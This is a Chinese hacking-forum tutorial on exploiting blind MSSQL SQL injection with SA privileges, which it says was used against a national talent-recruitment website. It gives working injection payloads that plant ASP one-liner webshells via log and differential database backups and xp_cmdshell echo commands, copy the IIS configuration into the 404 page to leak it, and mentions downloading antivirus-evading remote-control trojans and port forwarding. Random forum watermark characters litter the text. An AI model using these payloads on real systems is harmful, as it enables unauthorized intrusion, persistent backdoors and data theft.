sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
+ F+ k: _( |$ I% ~! F
$ S- W" a( K+ \) ~
6 `" N' c" H: D6 q! Z                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
. c, x8 q# ?2 a7 l8 F$ B* L
                                                                 
$ V- B7 s4 Z1 t) d6 E                                                                 
                                                                  论坛： http://www.90team.net/
# ~& d2 S' c. |) x7 H5 {0 z

+ f% }5 K* R# S5 d+ W) C
+ o" k/ h* N$ t( ]+ o友情检测国家人才网
7 X$ S7 W3 _- E- j! k4 W
/ D& ^; d; ^" P9 S: j! \3 m
: O8 E2 G+ |0 N) K7 z  m内容：MSSQL注入SA权限不显错模式下的入侵

1 _. e8 b0 W: b" D( n# \( n3 l
; ~* T3 G( c  W9 S/ d一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。

, e9 @; U( M0 p( W9 e我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。


这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
' R2 \% h6 f$ t
: C3 i$ c9 j1 W) x4 l思路：
2 y! L& L" D, S0 Z7 I# O+ \
# k* b$ v7 T; B0 F( X7 l首先：
- C- T) ?1 X9 m9 |9 o
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell

2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来
; L- q7 f9 i# b" i5 `: q$ v
6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。


" D; K: O3 U. r/ K5 V9 Y1 \" [
) t2 T* v/ |% V% ]7 \0 g在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
: `/ ?) ], t' w6 Q
* D# y% P( _1 H  e我直接演示后面一个方法
) A/ |' |( Q7 O/ T& d
, n( p/ E7 e+ F( @, g7 E
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
0 C5 i9 X$ n2 T5 M  I( Q2 {7 ~' j. w2 d


( C- @" h1 j4 ^
◆日志备份：

; T+ [  a& \) ^2 g/ K
1. 进行初始备份
0 E& g" _/ \' r; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

4 ~% R9 n- d1 z/ W  p' [2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

) h0 N; a0 r, w) ?' Q9 _. S: Y0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
3 W( i2 U$ R: p8 i  
( {3 k5 j2 U# V! q3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
- Q) ?# e6 `# M! w. z) g' u
( `+ L- v2 W% K" f+ x  T

, {. n( v4 U0 s% l. l. J3 N# |* i◆数据库差异备份

. P9 g$ g! T2 @* ]7 i（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
: _7 k8 ~# v& a
  n7 v! @; x# P. t. ~* f上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
- C2 ^- Q: F$ A8 E& n' J! ~
5 l) g. L3 G; K  O/ k: n; [* ?3 B
（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

/ P" Y) b. A5 E  g9 g& C+ }0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

3. 备份数据库并清理临时文件

, E5 O7 [  K( k;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

2 K# L3 n. O) ?: F8 g. q0x633A5C746573742E617370  为 c:\test.asp  删除临时文件



用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
. ^6 B- A4 f) e* D" X9 \
: e6 p9 i5 X1 M7 j$ t5 f2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
( G! k; F, H! s" X
读取IIS配置信息获取web路径

( `- ?  e1 A" ?* e/ H" w     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
% `- V/ z( [: ], H     
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--

! q7 z/ r5 a. c& P: x



! H6 B. E% U: k  K1 Y5 e
- @" p6 V, T8 g- f1 R" O( j& B
% P: {2 \( l/ ~7 R/ Q. j

. ~% R2 T! K/ n) ]+ _3 I
0 `3 U9 e( F- g0 r6 G$ d



- a, ~7 l  `0 j8 g: ?3 j
4 ^4 D; S+ z) n/ ]8 m

7 w8 H& n. Z- c6 e

* S8 `: X8 H: r; M, i9 ?


9 u( S8 A" U) H7 o- `7 O( ~+ n
& D( ^, j" k( G' H

4 H% \1 s; q0 x- g4 a9 N% y" A: M, x

  a) ^* @  e. f) f: i" \; d* Z
# ~' L/ I1 d1 @$ K4 h



) N9 x) x6 Y7 \: Z7 N
8 N, U  p3 `: m9 t; L0 W* j% V8 n: O
& h& W0 {$ p3 S% F; A$ ^
8 F+ M& \7 P9 R6 U

' p) k. x; ]0 y- a$ V
4 b# i+ @2 o2 q5 `" k
. p, G. s2 O' l; x/ P


5 M( k; A9 U" O" ^3 I/ w) q" Y$ z


5 w; j3 s( \+ W# f( A3 W

7 U& J: `9 z4 p) m; Z+ j# s
  ^; \9 h6 _( s6 f# M* S